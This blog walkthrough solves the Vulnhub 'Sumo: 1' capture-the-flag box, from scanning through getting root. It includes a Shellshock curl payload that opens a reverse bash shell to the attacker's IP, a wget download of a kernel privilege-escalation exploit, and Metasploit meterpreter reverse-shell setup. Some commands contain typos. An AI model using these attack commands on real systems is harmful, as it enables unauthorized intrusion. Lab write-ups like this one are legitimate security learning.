Sumo Vulnhub Walkthrough

| Sumo: 1 Walkthrough Vulnhub |

In this Article, we play another vulnhub box sumo is created by SunCSR Team. This VM is Beginner level you can download here sumo: 1 CTF

Goal

Get the root shell i.e.([email protected]:~#) and then obtain flag under /root).

Network Scanning

First we discover our target IP address using the netdiscover tool.

netdiscover
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

Now we have our target IP address our next step is scanning target machine ports and service using nmap ( -A ) aggressive scan

nmap -A 192.168.43.233
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

Enumeration

Our target two ports are open 22SSH, and an 80http service running for enumeration we will navigate to a web browser for exploring HTTP service

http://192.168.43.233

now we have no clue what we do then we chose nikto web vulnerability scanner

nikto --url http://192.168.43.223/

After completing the Nikto scan we found a directory /cgi-bin/test and this directory is vulnerable to the shellshock exploit before execute the curl command first we start our netcat listener

curl -v -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/192.168.43.103/4545" 0>&1' "  
http://192.168.43.233/cgi-bin/test/test.cgi
nc -lvp 4545
id
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

After execute the curl command we have reverse shell target machine and we try to find suid binary but we fail then we run the uname -r command and this command is shown target machine kernel version

and this kernel version is vulnerable perf_swevent_init’ Local Privilege Escalation move the /tmp directory and download the exploit

uname -r
wget http://192.168.43.103/k_exploit.c
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

then we compile the exploit but we see a error for compiling time gcc: error trying to exec ‘cc1’ : execvp:

chmod 777 kernal.c
gcc kernal.c -02 -o hackNos

now we have a big problem after compile the exploit our VM is crash again we create an Linux meterpreter reverse payload and using the wget command download this payload target machine /tmp directory

and run the msfconsole and load a plugin multi/handler set Linux meterpreter payload listener

msfconsole -x "use exploit/multi/handler"
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.43.103
set lport 4444
run

our Metasploit listener is start we add permission our payload then execute our payload using the command

chmod +x paylod.elf && ./payload
shell
python -c 'import pty;pty.spawn("/bin/bash")'
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub

again we go to the /tmp directory and recompile the exploit and add permission read,write,execute for all user and run exploit

gcc kernal.c -02 -o hackNos
chmod 777 hackNos && ./hackNos 0

our exploit is run successfully and we get root shell target machine so let’s move the /root directory and read our root.txt flag.

cd /root
ls
cat root.txt
Sumo Vulnhub Walkthrough | Sumo: 1  Walkthrough Vulnhub | sumo writeup vulnhub
Katana 1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

One Comment on “Sumo Vulnhub Walkthrough”

  1. hello,In the privilege promotion part, there is no root return after compiling and executing in my MSF session. Have you ever been in this situation

Leave a Reply

Your email address will not be published. Required fields are marked *